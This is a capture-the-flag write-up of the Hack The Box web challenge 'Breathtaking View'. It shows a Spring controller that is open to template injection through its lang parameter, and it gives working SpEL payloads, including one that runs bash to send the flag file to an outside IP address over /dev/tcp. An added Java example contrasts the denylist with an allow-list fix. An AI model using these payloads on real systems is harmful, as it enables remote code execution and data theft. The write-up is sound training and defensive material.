Breathtaking View

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of Breathtaking View, a web challenge from Hack The Box.

lang parameter in IndexController.java

@Controller
public class IndexController {
    @GetMapping("/")
    public String index(@RequestParam(defaultValue = "en") String lang, HttpSession session, RedirectAttributes redirectAttributes) {
        if (session.getAttribute("user") == null) {
            return "redirect:/login";
        }

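        // Denylist: only values containing "java" are rejected
        if (lang.toLowerCase().contains("java")) {
            redirectAttributes.addFlashAttribute("errorMessage", "But.... For what?");
            return "redirect:/";
        }

        // The user-controlled lang becomes part of the returned view name
        return lang + "/index";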
    }
}

lang is supplied by the user and is concatenated into the view name the controller returns.


Intercept the request with Burp


Find a possible injection

GET /?lang=__$%7bT(Runtime).getRuntime().exec(%22ls%22)%7d__::.x HTTP/1.1

Start a listener

nc -lvnp 4444

Trigger the request that sends the flag to the listener

GET /?lang=__$%7bT(Runtime).getRuntime().exec(new%20String%5b%5d%7b%22bash%22,%20%22-c%22,%20%22cat%20/flag*%20%3E%3E%20/dev/tcp/37.221.197.106/4444%22%7d)%7d__::.x HTTP/1.1


HTB{whAt_4_v1ewWwww!}
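
The controller's only check rejects values containing "java", so the probe above passes it and ends up inside the returned view name. The following is an added example, not part of the challenge source or the original writeup, that compares that check with an allow-list in which the request value only selects a constant view name. The class name, the method names and the "fr" and "de" entries are assumptions; only "en" appears on the page.

```java
import java.util.List;
import java.util.Locale;
import java.util.Map;

public class LangViewCheck {
    // Assumption: the languages the application ships templates for.
    // Only "en" is on the page; "fr" and "de" are hypothetical.
    private static final Map<String, String> VIEWS = Map.of(
            "en", "en/index",
            "fr", "fr/index",
            "de", "de/index");

    // The controller's logic from the page: reject the substring "java",
    // otherwise concatenate the request value into the view name.
    static String denylistView(String lang) {
        if (lang.toLowerCase().contains("java")) {
            return "redirect:/";
        }
        return lang + "/index";
    }

    // Hardened form: the request value is only a lookup key. The returned
    // view name is always one of the constants above, never user text.
    static String allowlistView(String lang) {
        String key = lang == null ? "" : lang.toLowerCase(Locale.ROOT);
        return VIEWS.getOrDefault(key, VIEWS.get("en"));
    }

    public static void main(String[] args) {
        // Constructed inputs: a supported language, an unsupported one,
        // and the URL-decoded probe from the request on the page.
        List<String> inputs = List.of(
                "en",
                "zz",
                "__${T(Runtime).getRuntime().exec(\"ls\")}__::.x");
        for (String lang : inputs) {
            System.out.println("input    : " + lang);
            System.out.println("denylist : " + denylistView(lang));
            System.out.println("allowlist: " + allowlistView(lang));
            System.out.println();
        }
    }
}
```

In the controller itself, the equivalent change is to return the looked-up constant instead of `lang + "/index"`.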